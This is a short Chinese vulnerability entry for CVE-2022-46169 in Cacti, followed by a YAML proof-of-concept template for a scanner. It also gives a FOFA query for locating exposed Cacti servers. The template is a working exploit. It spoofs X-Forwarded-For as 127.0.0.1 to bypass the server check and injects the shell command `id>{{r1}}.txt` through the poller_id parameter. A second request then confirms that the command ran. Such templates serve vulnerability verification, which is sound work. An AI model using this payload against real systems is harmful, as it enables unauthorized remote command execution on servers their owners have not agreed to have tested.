漏洞描述
Cacti是一个服务器监控与管理平台。在其1.2.17-1.2.22版本中存在一处命令注入漏洞,攻击者可以通过X-Forwarded-For请求头绕过服务端校验并在其中执行任意命令
fofa: app="Cacti-监控系统"
CVE-2022-46169: Cacti remote_agent.php 远程命令执行漏洞
PoC代码[已公开]
id: CVE-2022-46169
info:
name: Cacti remote_agent.php 远程命令执行漏洞
author: zan8in
severity: high
verified: true
description: |-
Cacti是一个服务器监控与管理平台。在其1.2.17-1.2.22版本中存在一处命令注入漏洞,攻击者可以通过X-Forwarded-For请求头绕过服务端校验并在其中执行任意命令
fofa: app="Cacti-监控系统"
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-46169
tags: cve,cve2022,cacti,remote-agent,command-injection
created: 2023/10/30
set:
r1: randomLowercase(8)
rules:
r0:
request:
method: GET
path: /remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=`id>{{r1}}.txt`
headers:
X-Forwarded-For: 127.0.0.1
expression: response.status == 200 && response.body.bcontains(b'"local_data_id":')
r1:
request:
method: GET
path: /{{r1}}.txt
headers:
X-Forwarded-For: 127.0.0.1
expression: response.status == 200 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)
expression: r0() && r1()